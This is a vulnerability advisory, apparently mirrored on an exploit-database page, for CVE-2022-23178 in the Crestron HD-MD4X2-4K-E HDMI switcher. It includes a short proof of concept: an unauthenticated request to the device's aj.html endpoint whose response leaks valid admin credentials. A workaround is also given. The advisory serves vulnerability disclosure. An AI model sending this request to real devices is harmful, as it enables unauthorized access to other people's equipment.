Lucene search
RedTeam1337DAY-ID-37227HistoryJan 13, 2022 - 12:00 a.m.
Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure Vulnerability
2022-01-1300:00:00
RedTeam
0day.today
266
0.04 Low
EPSS
Percentile
92.0%
Crestron HD-MD4X2-4K-E version 1.0.0.2159 suffers from a credential disclosure vulnerability. When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are disclosed which are valid to authenticate to the web interface.
Credential Disclosure in Web Interface of Crestron Device
When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.
Details
=======
Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178
Introduction
============
"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directoryยฎ credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."
(from the vendor's homepage)
More Details
============
Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.
Proof of Concept
================
Requesting the URL "http://crestron.example.com/" via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:
------------------------------------------------------------------------
http://crestron.example.com/aj.html?a=devi&_=[...]
------------------------------------------------------------------------
This request results in a response similar to the following:
------------------------------------------------------------------------
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html
{
"login_ur": 0,
"front_val": [
0,
1
],
"uname": "admin",
"upassword": "password"
}
------------------------------------------------------------------------
The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.
Workaround
==========
Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.
Fix
===
No fix known.
Related
zdt
zdt
Creston Web Interface 1.0.0.2159 - Credential Disclosure Vulnerability
2022-01-18 00:00:00
nuclei
nuclei
Crestron Device - Credentials Disclosure
2022-01-23 11:28:25
packetstorm
packetstorm
Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure
2022-01-12 00:00:00
cve
cve
CVE-2022-23178
2022-01-15 15:17:30
nvd
nvd
CVE-2022-23178
2022-01-15 15:17:30
prion
prion
Design/Logic Flaw
2022-01-15 15:17:00
cvelist
cvelist
CVE-2022-23178
2022-01-15 14:40:25
exploitdb
exploitdb
Creston Web Interface 1.0.0.2159 - Credential Disclosure
2022-01-18 00:00:00